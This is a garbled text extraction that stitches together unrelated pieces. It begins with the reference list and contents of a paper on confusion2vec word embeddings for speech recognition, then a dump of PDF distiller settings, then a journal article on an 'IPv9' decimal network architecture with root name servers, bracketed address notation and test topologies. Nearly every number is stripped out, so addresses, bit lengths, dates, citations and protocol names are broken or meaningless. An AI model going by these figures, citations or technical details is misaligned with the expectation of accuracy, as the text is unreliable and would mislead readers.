o, goldberg y. . dependency-based word embeddings. in: proceedings of the nd annual meeting of the association for computational linguistics, acl . june – , . vol. . baltimore: short papers, – . lilleberg j, zhu y, zhang y. . support vector machines and word vec for text classification with semantic features. in: ieee th international conference on cognitive informatics & cognitive computing (icci� cc). piscataway: ieee, – . ling w, dyer c, black aw, trancoso i. . two/too simple adaptations of word vec for syntax problems. in: naacl hlt , the conference of the north american chapter of the association for computational linguistics. may —june , . denver: human language technologies, – . liu x, wang y, chen x, gales mjf, woodland pc. . efficient lattice rescoring using recurrent neural network language models. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.specom. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ luong t, socher r, manning c. . better word representations with recursive neural networks for morphology. in: proceedings of the seventeenth conference on computational natural language learning, conll . august – , , sofia, – . mangu l, brill e, stolcke a. . finding consensus in speech recognition: word error minimization and other applications of confusion networks. computer speech & language ( ): – doi . /csla. . . marin a, kwiatkowski t, ostendorf m, zettlemoyer l. . using syntactic and confusion network structure for out-of-vocabulary word detection. in: ieee spoken language technology workshop (slt). piscataway: ieee, – . mathias l, byrne w. . statistical phrase-based speech translation. in: ieee international conference on acoustics, speech and signal processing. piscataway: ieee, . matusov e, kanthak s, ney h. . on the integration of speech recognition and statistical machine translation. in: interspeech —eurospeech, th european conference on speech communication and technology. september – , , lisbon, – . matusov e, ueffing n, ney h. . computing consensus translation for multiple machine translation systems using enhanced hypothesis alignment. in: eacl , st conference of the european chapter of the association for computational linguistics, proceedings of the conference, april – , , trento. mikolov t, chen k, corrado g, dean j. a. efficient estimation of word representations in vector space. in: st international conference on learning representations, iclr , may – , , scottsdale: workshop track proceedings. mikolov t, karafiát m, burget l, Černockỳ j, khudanpur s. . recurrent neural network based language model. in: interspeech , th annual conference of the international speech communication association. september – , , makuhari, chiba, – . mikolov t, le qv, sutskever i. b. exploiting similarities among languages for machine translation. arxiv preprint available at http://arxiv.org/abs/ . . mikolov t, sutskever i, chen k, corrado gs, dean j. c. distributed representations of words and phrases and their compositionality. in: advances in neural information processing systems : th annual conference on neural information processing systems . december – , , lake tahoe, – . mnih a, kavukcuoglu k. . learning word embeddings efficiently with noise-contrastive estimation. in: advances in neural information processing systems : th annual conference on neural information processing systems . december – , , lake tahoe, – . niehues j, kolss m. . a pos-based model for long-range reorderings in smt. in: proceedings of the fourth workshop on statistical machine translation, wmt@eacl . march – , , athens, – . ogata j, goto m. . speech repair: quick error correction just by using selection operation for speech input interfaces. in: interspeech —eurospeech, th european conference on speech communication and technology. september – , , lisbon, – . onishi t, utiyama m, sumita e. . paraphrase lattice for statistical machine translation. ieice transactions on information and systems ( ): – doi . /transinf.e .d. . pennington j, socher r, manning c. . glove: global vectors for word representation. in: proceedings of the conference on empirical methods in natural language processing, emnlp . october – , . doha: a meeting of sigdat, a special interest group of the acl, – . povey d, ghoshal a, boulianne g, burget l, glembek o, goel n, hannemann m, motlicek p, qian y, schwarz p, silovsky j, stemmer g, vesely k. . the kaldi speech recognition gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /csla. . http://arxiv.org/abs/ . http://dx.doi.org/ . /transinf.e .d. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ toolkit. in: ieee workshop on automatic speech recognition and understanding, december . piscataway: ieee signal processing society. qiu s, cui q, bian j, gao b, liu t-y. . co-learning of word representations and morpheme representations. in: coling , th international conference on computational linguistics, proceedings of the conference. august – , . dublin: technical papers, – . quirk c, brockett c, dolan w. . monolingual machine translation for paraphrase generation. in: proceedings of the conference on empirical methods in natural language processing emnlp , a meeting of sigdat, a special interest group of the acl, held in conjunction with acl . – july , barcelona, – . rosti a-v, ayan nf, xiang b, matsoukas s, schwartz r, dorr b. a. combining outputs from multiple machine translation systems. in: human language technology conference of the north american chapter of the association of computational linguistics, proceedings. april – , , rochester, – . rosti a-v, matsoukas s, schwartz r. b. improved word-level system combination for machine translation. in: acl , proceedings of the th annual meeting of the association for computational linguistics. june – , , prague. sagae k, lehr m, prud’hommeaux e, xu p, glenn n, karakos d, khudanpur s, roark b, saraclar m, shafran i, bikel d, callison-burch c, cao y, hall k, hasler e, koehn p, lopez a, post m, riley d. . hallucinated n-best lists for discriminative language modeling. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . schnabel t, labutov i, mimno d, joachims t. . evaluation methods for unsupervised word embeddings. in: proceedings of the conference on empirical methods in natural language processing, emnlp . september – , , lisbon, – . schroeder j, cohn t, koehn p. . word lattices for multi-source translation. in: eacl , th conference of the european chapter of the association for computational linguistics, proceedings of the conference. march —april , , athens, – . schultz t, jou s-c, vogel s, saleem s. . using word latice information for a tighter coupling in speech translation systems. in: interspeech —icslp, th international conference on spoken language processing. october – , , jeju island. seigel ms, woodland pc. . combining information sources for confidence estimation with crf models. in: interspeech , th annual conference of the international speech communication association. august – , , florence, – . shivakumar pg, li h, knight k, georgiou p. . learning from past mistakes: improving automatic speech recognition output via noisy-clean phrase context modeling. apsipa transactions on signal and information processing :e doi . /atsip. . . soricut r, och f. . unsupervised morphology induction using word embeddings. in: naacl hlt , the conference of the north american chapter of the association for computational linguistics. may –june , . denver: human language technologies, – . sperber m, neubig g, niehues j, waibel a. . neural lattice-to-sequence models for uncertain inputs. in: proceedings of the conference on empirical methods in natural language processing, emnlp . september – , , copenhagen, – . su j, tan z, xiong d, ji r, shi x, liu y. . lattice-based recurrent neural network encoders for neural machine translation. in: proceedings of the thirty-first aaai conference on artificial intelligence. february – , , san francisco, – . gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /atsip. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sundermeyer m, tüske z, schlüter r, ney h. . lattice decoding and rescoring with long- span neural network language models. in: interspeech , th annual conference of the international speech communication association. september – , , singapore, – . tai ks, socher r, manning cd. . improved semantic representations from tree-structured long short-term memory networks. in: proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing of the asian federation of natural language processing, acl . july – , . vol. . beijing: long papers, – . tan qf, audhkhasi k, georgiou pg, ettelaie e, narayanan ss. . automatic speech recognition system channel modeling. in: interspeech , th annual conference of the international speech communication association. september – , , makuhari, chiba, – . tan z, su j, wang b, chen y, shi x. . lattice-to-sequence attentional neural machine translation models. neurocomputing : – doi . /j.neucom. . . . tur g, wright j, gorin a, riccardi g, hakkani-tür d. . improving spoken language understanding using word confusion networks. in: th international conference on spoken language processing, icslp interspeech , september – , , denver. wahlster w. . verbmobil: foundations of speech-to-speech translation. berlin, heidelberg: springer science & business media. weide r. . the cmu pronunciation dictionary, release . . available at http://www.speech.cs. cmu.edu/cgi-bin/cmudict. wuebker j, ney h. . phrase model training for statistical machine translation with word lattices of preprocessing alternatives. in: proceedings of the seventh workshop on statistical machine translation, wmt@naacl-hlt . june – , , montreal, – . xing c, wang d, zhang x, liu c. . document classification with distributions of word vectors. in: signal and information processing association annual summit and conference (apsipa), asia-pacific. piscataway: ieee, – . xiong w, droppo j, huang x, seide f, seltzer m, stolcke a, yu d, zweig g. . achieving human parity in conversational speech recognition. arxiv preprint available at http://arxiv.org/abs/ . . xu h, povey d, mangu l, zhu j. . minimum bayes risk decoding and system combination based on a recursion for edit distance. computer speech & language ( ): – doi . /j.csl. . . . xu p, roark b, khudanpur s. . phrasal cohort based unsupervised discriminative language modeling. in: interspeech , th annual conference of the international speech communication association. september – , , portland, – . xue j, zhao y. . improved confusion network algorithm and shortest path search from word lattice. in: proceedings. (icassp’ ). ieee international conference on acoustics, speech, and signal processing, . vol. . piscataway: ieee, – . yin w, schütze h. . learning word meta-embeddings. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers) berlin: acl. available at http://aclweb.org/anthology/p/p /p - .pdf. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.neucom. . . http://www.speech.cs.cmu.edu/cgi-bin/cmudict http://www.speech.cs.cmu.edu/cgi-bin/cmudict http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.csl. . . http://aclweb.org/anthology/p/p /p - .pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ confusion vec: towards enriching vector space word representations with representational ambiguities introduction motivation case study: application to automatic speech recognition proposed models training schemes evaluation methods data and experimental setup results vector space analysis discussion potential applications conclusion future work appendix flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , research on the system structure of ipv based on tcp/ip/m wang jianguo . state and provincial joint engineering lab. of advanced network, monitoring and control xi'an, china . school of computer science and engineering xi'an technological university xi'an, china e-mail: wjg_xit@ .com wang zhongsheng . school of computer science and engineering xi'an technological university xi'an, china . state and provincial joint engineering lab. of advanced network, monitoring and control xi'an, china e-mail: wzhsh @ .com xie jianping . chinese decimal network working group shanghai, china . shanghai decimal system network information technology ltd. e-mail: @ .cn zhong wei . chinese decimal network working group shanghai, china . shanghai decimal system network information technology ltd. e-mail: @ .cn abstract—network system structure is the basis of network communication. the design of network model can change the network structure from the root, solve the deficiency of the original network system, and meet the new demand of the future network. tcp/ip as the core network technology is successful, it has shortcomings but is a reasonable existence, will continue to play a role. considering the compatibility with the original network, the new network model needs to be compatible with the existing tcp/ip four-layer model, at the same time; it can provide a better technical system to implement the future network. based on the internet three-layer/four-layer hybrid architecture tcp/ip/m and iso/iec next-generation internet standard solutions, this paper proposes the ipv system architecture, which can directly transmit audio and video data with three layers on the premise of not affecting the existing four-layer network transmission. the hybrid structure is a new transmission theory, which requires the establishment of a link before data transmission and the withdrawal of the link after the transmission is completed. it solves the problem of high-quality real-time media communication caused by the integration of three networks (communication network, broadcasting network and internet) from the underlying structure of the network, realizes the long-distance and large-traffic data transmission of the future network, and lays a solid foundation for the digital currency and virtual currency of the internet. the system framework is verified by practical application. it have been deployed to verify the compatibility and reliable transmission between ipv network and the existing network, under the independent, reliable, secure and controllable network architecture, a new generation of master root server and root domain name servers. international journal of advanced network, monitoring and controls volume , no. , keywords-tcp/ip/m; next generation internet; ipv ; big data stream i. new generation network system ipv ipv protocol as one of the future network concepts, ietf proposed some basic dreams of ipv in , and looked forward to the idea of network in the st century. such as: -bit length address, direct routing and the layer routing addressing method. however, due to the lack of research results of basic theories, address stratification technology, high research and development costs, intellectual property rights and other factors, the research publicly failed. in , the ipv working group was disbanded and intellectual property and patent results were not obtained. inspired by ipv , chinese scholars have established a new generation of network work expert teams. based on the patent "method of using whole digital code to assign addresses for computer", they have completed the development of a new generation of network system after more than years of research and development. the development of the system, its theory and practice has reflected the novelty and originality. the decimal network has experienced the stages of assumption, theory, model, prototype, small-scale trial and demonstration project implementation. since september , the ministry of information industry of china has decided to establish "decimal network standard working group (also known as ipv working group)", "new-generation security and controllable network expert working group", and "electronic label working group data", united domestic and foreign enterprises, research institutions and universities to develop the ipv protocol with independent intellectual property of the digital domain name and other technical standards. by june , the ministry of industry and information technology announced the approval of the four standards of the ipv system. through unremitting efforts in various aspects, the ipv system mother root server, the main root server, and root name servers named after n-z letter have been developed. ii. the design of ipv architecture the conventional packet switching of tcp/ip protocol does not support real time application and circuit switching application, that is, the transmission of sound or image by circuit in the four-layer protocol. tcp/ip is a connectionless unreliable packet protocol with a maximum packet size of bytes. the main idea of ipv design is to combine the ip protocol of tcp/ip with circuit switching, and make use of routers compatible with both protocols and a series of protocols, so that the addresses of ipv , ipv and ipv can be used simultaneously on the internet. a. the hierarchy of ipv ipv system adopts the mixed network architecture of three-layer circuit/four-layer grouping, adopts the rules of verify first and then communication, address encryption, the address length could alter from -bie to -bit, resource reservation, and adopts character direct route transmission mode, which apply virtual and real circuit to ensure the transmission security. the architecture diagram is shown in figure . international journal of advanced network, monitoring and controls volume , no. , fn t hree/four layer model network application layer tcp udp ip m arp arp enet enet ethernet cable ethernet cable tcp/ip/m application layer transport layer internetw- orking layer virtual real circuit network interface layer figure . the architecture diagram b. ipv connection method tcp/ip/m protocol has developed absolute code stream and long stream code classes, a long packet can reach more than tens of megabytes. it can transmit telephone and cable tv data directly in three layers without affecting existing four-layer networks. a four/three-layer transport protocol with a new transmit theory that is not removed connect link until finished the transmission. the connection mode is shown in figure . internet internet internet internet composite time division virtual circuit,user exclusive bandwidth (network cable, optical fiber) three layers three layers virtual circuit connection voice communication, file transfer, video conferencing four layers four layers four layers user alpha user beta figure . the connection mode international journal of advanced network, monitoring and controls volume , no. , ipv automatic allocation access system, the system uses openvpn to set up virtual private network, uses ip tunnel for over data transmission, tr as the control protocol to push data to the terminal, to achieve the ipv subnet to subnet or ipv transmission. it can be a transmission between different individual routes or between the same enterprise routes, or between enterprise or individual routes to backbone routes. openvpn was adopted to penetrate the subnet to form the proprietary virtual network, and on the basis of the virtual network, ip tunnel was implemented to complete the data transmission of over .in the virtual private network, the tr protocol is used to push the automatically assigned personal address or manually assigned business address, and at the same time, the to of the individual or business is automatically pushed to the device router.ipv network management system is a set of comprehensive network management system based on web interface that provides network monitoring and other functions. it can monitor various network parameters and server parameters to ensure the safe operation of server system. both ipv and ipv protocols are supported and flexible notification mechanisms are provided for system administrators to quickly locate and resolve problems. ipv network and ipv /ipv hybrid network is constructed by using ipv design router, client, protocol conversion router and other devices. it includes ipv future network root domain name system, promoting technology integration, business integration and data integration, and realizing cross-level, cross-region, cross-system, cross-department and cross-business collaborative management and services. we will build an integrated national big data center and gateway bureau through data centralization and sharing, and build a secure and controllable information technology system. c. root domain name server ipv root dns server is mainly used to manage the internet and decimal network home directory. ipv root name server system consists of a parent root server, primary root server, root name servers named by n-z, top-level domain server named by·chn,·usa,·hkg,·mac and other three characters countries and regions, routing management system, application server and gigabit backbone routers. the china decimal network standards working group is responsible for management of the decimal network root name server, domain name system, and ip address. the principle of root domain name server is that root domain servers first read the primary root server, and then read the parent root server to obtain the data, and then spread to the whole network. the root dns servers are all equal. the system includes the parent root server and the primary root server. this hidden publishing host is accessed by only root domain-name servers, which are read by mirror servers. the ipv root name server system is shown in figure . international journal of advanced network, monitoring and controls volume , no. , ipv / router n root domain name server o root domain name server p root domain name server q root domain name server r root domain name server s root domain name server t root domain name server u root domain name server v root domain name server w root domain name server x root domain name server y root domain name server z root domain name server ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router ipv / router tld tld tld tld ipv /v network management server primary root server virtual cloud root server chn national domain name server usa national domain name server hkg national domain name server basket management system ipv / router client presentation system ipv / router ipv / router ipv / router figure . the ipv root name server system the root name server is the highest level domain name server in dns (domain name system) and is responsible for providing the authorized domain name server address for resolving the tld (top level domain). at present, the root dns server and the gtld (general top-level domain) and the cctld (country/region top-level domain) are managed and controlled by icann (internet corporation for assigned names and numbers). the domain name system is the basic service of the internet, and the root server is the foundation of the whole domain name system. the ipv -based root domain name resolution system can adapt to the ipv network, ipv network, ipv network. ipv resolution system can resolve the internet user's domain name through the domain name server to obtain the corresponding access object ip address, and can send the request of non-digital domain name to the corresponding english domain name server or chinese domain name server and domain name server in various languages, compatible with the current various domain name services. international journal of advanced network, monitoring and controls volume , no. , iii. the text representation of ipv address the text representation of ipv address include "square brackets decimal" notation, "curly brackets decimal" notation, and " round brackets decimal" notation. a. square brackets decimal the bracket decimal can be expressed in the following two ways: ) bits are represented by "[]". the bits in the "[]" symbol are expressed in decimal notation and can be written in indefinite length. ) ipv address representation with a length of bits is in the form of " y[y[y[y[y[y[y[y", where each y represents a -bit part of the address and is expressed in decimal. = , so y is a decimal number of ten digits. for example: [ ] [ ] [ ] . in address representation, multiple consecutive zeros to the left of each decimal number can be omitted, but a decimal number that is completely zero needs to be represented by a zero. the contiguous all- field in the address is replaced by a pair of square brackets "[x]" (x is the number of segments in the all- field).the above address may be written as [ [ ] [ [ . b. curly brackets decimal this method divides the -bit address into four -bit decimal numbers represented by curly braces separating them. the representation method is in the form of "z}z}z}z", where each z represents a -bit portion and is represented in decimal notation. it usage is exactly the same as y, and it is compatible with y. this greatly facilitates the current compatibility of these ipv addresses in ipv . c. round brackets decimal since the address length of ipv defaults to bits, there will still be many bits in each segment regardless of whether or segments are used. for example, each segment still has bits with an -segment representation. in this way, the following situation will appear in the paragraph: ...] ]...such a situation is not only cumbersome to input, but also easy to make mistakes. for convenience, the parenthesis notation -- (k/l) is introduced, where "k" means or and "l" means the number of or . the above example can be abbreviated as :...]( / ) of ].... d. a text representation of the address prefix the ipv address scheme is similar to the supernetting and cidr (classless inter-domain routing) schemes of ipv , which all use the address prefix to represent the network hierarchy. the ipv address prefix is represented by a cidr like representation in the form ipv address/address prefix length. ipv addresses are written in ipv address notation, and the length of the address prefix is the length of the contiguous bits that form the address prefix from the leftmost part of the address. for example, the address prefix [ ] [ [ ] [ ] for bits can be expressed as: [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]/ , short for: [ ] [ ]/ . the ping implementation of the decimal network ipv address is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . the ping implementation of the decimal network ipv address iv. implementation of ipv system the ipv protocol implements the assumption that the address length is extended by the current -bit -bit address and direct routing, and the original router class address addressing method is extended to the -layer route addressing method. according to the deficiency of the real network and the actual demand of future network, the new address, domain name system and routing addressing theory are studied to solve the problem of network resources and engineering implementation technology. in order to be compatible with the existing internet, dual stack technology is adopted. dual stack technology refers to enabling both ipv stack and ipv stack on a single device. in this way, the device can communicate with both the ipv and ipv networks. if the device is a router, the interfaces of router are configured with ipv addresses and ipv addresses, and can connect to the ipv and ipv networks. if the device is a computer, it would have both an ipv address and an ipv address, and the ability to handle both. the ipv dual protocol stack is shown in figure . figure . the ipv dual protocol stack a. hardware component ipv system hardware devices are composed as follows: international journal of advanced network, monitoring and controls volume , no. , ) core router core routers, also known as "backbone routers", are routers located in the center of the network. routers located on the edge of the network are called access routers. core routers and edge routers are relative concepts. they all belong to the router, but they come in different sizes and capacities. the core router of one layer is the edge router of the other layer. it is used for ipv core network environment to realize large capacity data exchange. ) edge router edge routers, also known as "access routers", are routers located on the periphery of a network. edge routers and core routers both belong to routers, but they have different sizes and capacities. the core router of one layer is the edge router of another layer. ) ipv -ipv protocol conversion router ipv -ipv protocol conversion router is used for mutual conversion between ipv and ipv protocols. ipv protocol data is converted to ipv protocol data by using preset mapping rules through to network interface devices.ipv protocol data is converted to ipv protocol data using preset mapping rules through the to network interface device. ) embedded router embedded router is low-cost user side access router. it can be easily deployed in the case of access to ipv network and the internet. ) client system support centos . bit, centos bit client, and support mainstream linux release later. ipv virtual machine that supports vmware allows customers to quickly deploy with existing hardware devices. windows , , based on windows ipv protocol stack client. ) beidou /gps timing server system support beidou, gps satellite signal, and provide ipv , ipv protocol ntp server. user devices can be timed over ipv or ipv protocols. b. software system ) ipv network management system ipv network management system is a set of comprehensive network management system based on web interface that provides network monitoring and other functions. it can monitor various network parameters and server parameters to ensure the secure operation of server system. both ipv and ipv protocols are supported and flexible notification mechanisms are provided for system administrators to quickly locate and resolve problems. ) ipv automatic allocation access system the system set up a virtual private network with openvpn, ip tunnel for over data transmission, and tr as the control protocol to push data to the terminal, and finally the ipv subnet to subnet or ipv transmission was realized. ipv subnet to subnet or ipv transmission can be implemented in different personal routing, the same enterprise routing, or between enterprise and personal routers to backbone routes. openvpn is adopted to penetrate the subnet to form the proprietary virtual network; ip tunnel is implemented to complete the data transmission of over on the basis of the virtual network. in the virtual private network, the tr protocol is used to push the automatically assigned personal address and manually assigned enterprise address, and at the same time, the to of the individual or enterprise is automatically pushed to the device router. ) ipv windows protocol stack based on the original ipv and ipv protocols of the windows operating system, the ipv protocol is added to realize the dual stack working access. v. application of ipv system we designed the following scenarios to more fully reflect the features and advantages of the ipv network system. international journal of advanced network, monitoring and controls volume , no. , a. application —pure ipv network architecture this application implements a pure ipv network architecture. the simplest system includes ipv client/server a, ipv client/server b, g ipv routers c, d. the network topology is shown in figure . ipv ipv ipv ipv client a ipv client bipv router c ipv router d figure . pure ipv client-server test topology the pure ipv network architecture is suitable for building a pure ipv network in one area and establishing an independent ipv network system. b. application —ipv network applications are connected via pure ipv network. this application implements ipv network application to communicate through pure ipv network. the simplest system includes ipv client/server a, ipv client/server b, ipv g routers c and d. the network topology is shown in figure . ipv ipv ipv ipv client a ipv client bipv router c ipv router d figure . ipv network application test topology through pure ipv network connection this scenario is suitable for several ipv networks in different regions connected through the ipv core network to achieve penetration access between different ipv networks. a main feature is that other areas are using the ipv protocol transmission in addition to the existing ipv network, which requires the different ipv network between the need for a private network connection (such as optical fiber, ddn line, etc.). c. application —ipv network is connected through over tunnel this application implements ipv network application communication through over tunnel. the simplest system includes ipv client/server a, ipv client/server b, ipv g router c, d. the biggest difference between scenario and scenario is that the ipv public network address between routers c and d is based on over tunnel communication. this scenario simulates that ipv uses the existing ipv public network to achieve ipv network connectivity in different geographic regions, and has the ability to build a national network. the network topology is shown in figure . ipv ipv ipv ipv client a ipv client bipv router c ipv router d figure . ipv network test topology through over tunnel connection international journal of advanced network, monitoring and controls volume , no. , ipv networks in different areas are connected through the ipv over ipv core network to achieve transparent access between different ipv networks. a major feature is that system uses existing ipv networks between core networks, communicates via over tunnel mode. it uses the existing ipv public network to quickly establish connections between different regional ipv networks and achieve penetration access. d. application —ipv network connected through over tunnel this application implements ipv network application communication through over tunnel. the simplest system includes ipv client/server a, ipv client/server b, ipv g router c, d. the network topology is shown in figure . ipv ipv ipv ipv client a ipv client bipv router c ipv router d figure . ipv network test topology through over tunnel connection the application implements the ipv network to connect through the ipv over ipv core network to achieve transparent access between different ipv networks. a major feature is the use of existing ipv networks between core networks, communicating via over tunnel mode. e. application —hybrid network architecture in this application, the client side of the ipv access router accesses the ipv network and the ipv network. the network side of multiple ipv access routers accesses the user side of the same core router, and the network side of the core router accesses the ipv network and ipv network (including public network). the application can achieve the following functions: ( ) ipv client penetrates private network to access the ipv client of other subnets; ( ) ipv client accesses the internet normally; ( ) ipv client accesses the ipv client of other autonomous domains; ( ) ospfv dynamic router protocol is used between access routers to establish network; ( ) ipv core routers can choose to use over network to access shanghai node ipv network, or use pure ipv protocol to access beijing node ipv network. the network topology is shown in figure . international journal of advanced network, monitoring and controls volume , no. , ipv client ipv client ipv client ipv client ipv client ipv client access router ty-gd g access router ty-gd g access router ty-gd g backbone router ty-gd g ipv ipv ipv ipv client ipv client ipv client ipv client access router ty-gd g access router ty-gd g backbone router ty-gd g ipv ipv ipv /ipv ipv /ipv switch ty-gdsw ipv access router c backbone router c ipv ipv client ipv client ipv internet over over shanghai backbone node ipv access router d backbone router d ipv ipv client ipv client beijing backbone node backbone router ty-gd g ipv figure . ipv hybrid network architecture test topology this application scenario is mainly used to build an ipv network environment and seamlessly integrate ipv networks and ipv networks. all ipv and ipv network islands are connected using the ipv protocol or the existing ipv public network. it is convenient and fast to connect independent networks in different regions to form a national unified network by using the ipv network system. f. application --ipv root domain name agent system ipv root domain name system provides the system expansion support capability compatible with the rfc protocol under the support of a powerful database, and forms a symbiotic relationship with the existing ipv domain name system. at the same time, it provides an independent and controllable application guarantee for the ipv domain name. the system network includes three parts: ipv domain name back-end support system, routing and network add service system, and application system. ipv domain name back-end support system can be deployed in a grid, deployed in shanghai and beijing to establish a root domain extension support environment that is both organic and relatively independent. the routing and network service system can choose ipv , ipv networks or ipv network. the application system includes mobile terminal and international journal of advanced network, monitoring and controls volume , no. , desktop platform support system. the network topology is shown in figure . figure . ipv root domain name proxy system topology figure . ipv root domain name proxy system analysis results vi. summary the main technical features and innovations of ipv system are as follows. ) independent address text format decimal network technology can be independent of the original ipv and ipv network networking. the ipv address text representation of decimal network uses the arabic numerals of - and "[" as a separator, which is compatible with ipv and ipv . ) infinite ip address space the length of ipv address is , can be up to . it conforms to assumptions of iso future networks n , n , n and rfc , rfc . the address resources are very rich. 